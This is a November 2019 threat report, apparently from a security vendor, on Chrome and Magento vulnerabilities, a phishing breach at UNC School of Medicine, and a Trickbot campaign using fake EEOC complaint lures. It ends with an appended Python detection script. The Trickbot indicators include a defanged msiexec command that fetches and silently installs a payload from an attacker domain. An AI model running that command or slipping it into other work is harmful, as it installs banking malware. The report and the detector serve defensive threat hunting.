Thursday November 14th 2019
We’re back with another edition of the usually weekly threat report. This week we’re highlighting two critical vulnerabilities, a case of business email compromise for a medical school, and a Trickbot campaign targeting U.S. government offices.
If you haven’t updated Chrome recently, you might want to. In early November, a critical use-after-free vulnerability was disclosed in Google Chrome (CVE-2019-13720). Earlier this week a proof-of-concept exploit for the vulnerability was posted on YouTube by Tony Stack.
The vulnerability has been patched in Chrome version 78.0.3904.87, but older versions are being actively exploited. Users on the Exploit.in forum have been discussing the vulnerability, which shows that many threat actors want to leverage it against out-of-date versions of Chrome.
E-commerce platform Magento warned its users to apply a security patch for a remote code execution vulnerability tracked as CVE-2019-8144, impacting Magento 2.3 prior to 2.3.3 or 2.3.2-p.
The vulnerability could allow unauthenticated attackers to deliver malicious payloads to a merchant’s site and execute them. On October 8, 2019, Magento released a security update to address the vulnerability, but installations whose owners have not applied the update remain vulnerable. Users are advised to update to Magento Commerce 2.3.3 or apply the security-only patch 2.3.2-p2 to address the vulnerability.
In addition to applying security patches, Magento also recommends checking websites and servers to determine whether they were compromised before upgrading.
Around 3,716 individuals may have been affected by a phishing and BEC incident that resulted in a data breach at the University of North Carolina School of Medicine. Some School of Medicine students fell victim to a phishing attack against their email accounts.
Between May 17, 2018, and June 18, 2018, an unauthorized third party was able to gain access to several email accounts containing personal information of some patients, possibly related to treatment received at UNC.
These email accounts contain information such as patients’ names, dates of birth, and demographic data such as addresses, health insurance information, health information, social security numbers, financial account information and/or credit card information.
Mail notifications to affected patients started being sent out on November 12, 2019. The university also offered limited monitoring and identity protection services to the affected individuals, which does not cover the damage patients have already suffered.
UNC School of Medicine is taking steps to prevent additional BEC compromise by adding multi-factor authentication and enrolling employees in security awareness training. There has been no mention of whether UNC business practices will change to prevent sensitive patient information from being shared via email. Business processes involving sensitive information should not be conducted via email.
Fake sexual harassment complaints from the U.S. Equal Employment Opportunity Commission (EEOC) are the latest lure used by attackers to disseminate the Trickbot banking Trojan onto the devices of unsuspecting employees of large companies.
Based on availability data from Perch, this campaign is still very active with a first sighting on November 3rd, 2019. Based on the customers being targeted, the campaign seems mostly geared towards the financial service, education, retail, and health industries.
According to recent reports, the malware operators use information collected for each target to customize the phishing emails to look legitimate. The attackers use “Name_of_Victim – A grievance raised against you” subjects for each of the phishing emails to draw in the attention of their targets.
Additionally, the malicious attachments containing the Trickbot payloads have customized names and use the following format “Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc” to further entice the target into opening the attachment. Organizations should implement security monitoring processes to prevent, detect, and respond to phishing attacks. Enjoy some IoCs for your hunting pleasure.
2nd Stage Download (through MSI)
msiexec /i http://ftpthedocgrp[.]com/backup.msi /q
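As an added example of the monitoring the Trickbot section above calls for (this is not Perch's code nor part of the original report), the script below screens constructed mail metadata for the lure's subject and attachment-name format and flags a process log line in which msiexec installs an MSI fetched from a URL, the second-stage technique listed above. The "user|image|command line" log format and all sample values are assumptions.

```python
import re

# Constructed sample mail metadata (not real messages); the subject and
# attachment names follow the lure format quoted in the report.
SAMPLE_EMAILS = [
    {"subject": "Jane Doe – A grievance raised against you",
     "attachments": ["Jane Doe – Harassment complaint letter (phone 111-222-3333).doc"]},
    {"subject": "Quarterly budget review", "attachments": ["budget_q4.xlsx"]},
    {"subject": "Re: lunch", "attachments": []},
]

# Constructed process-creation log lines in an assumed "user|image|command line" format.
SAMPLE_PROC_LOGS = [
    "alice|C:\\Windows\\System32\\msiexec.exe|msiexec /i http://example.invalid/backup.msi /q",
    "alice|C:\\Windows\\System32\\msiexec.exe|msiexec /i C:\\installers\\vpn.msi",
]

# Subject: "<victim> – A grievance raised against you" (en dash or hyphen).
SUBJECT_RE = re.compile(r"\s[–-]\s*A grievance raised against you\s*$", re.I)
# Attachment: "<victim> – Harassment complaint letter (phone 111-222-3333).doc"
ATTACH_RE = re.compile(r"Harassment complaint letter \(phone [\d-]+\)\.docx?$", re.I)
# msiexec /i pointed at an http(s) URL rather than a local package path.
MSIEXEC_URL_RE = re.compile(r"msiexec(\.exe)?\s+.*?/i\s+https?://", re.I)


def flag_phishing_email(email):
    """Return the reasons a message matches the EEOC-lure pattern (empty if clean)."""
    reasons = []
    if SUBJECT_RE.search(email.get("subject", "")):
        reasons.append("subject matches grievance lure")
    for name in email.get("attachments", []):
        if ATTACH_RE.search(name):
            reasons.append(f"attachment name matches lure: {name}")
    return reasons


def flag_msiexec_remote_install(log_line):
    """True when the logged command line installs an MSI fetched over HTTP(S)."""
    try:
        _user, _image, cmdline = log_line.split("|", 2)
    except ValueError:  # malformed line: do not crash the scan
        return False
    return bool(MSIEXEC_URL_RE.search(cmdline))


def scan(emails, proc_logs):
    """Return (flagged subjects, flagged process log lines)."""
    flagged_emails = [e["subject"] for e in emails if flag_phishing_email(e)]
    flagged_procs = [line for line in proc_logs if flag_msiexec_remote_install(line)]
    return flagged_emails, flagged_procs


if __name__ == "__main__":
    print(scan(SAMPLE_EMAILS, SAMPLE_PROC_LOGS))
```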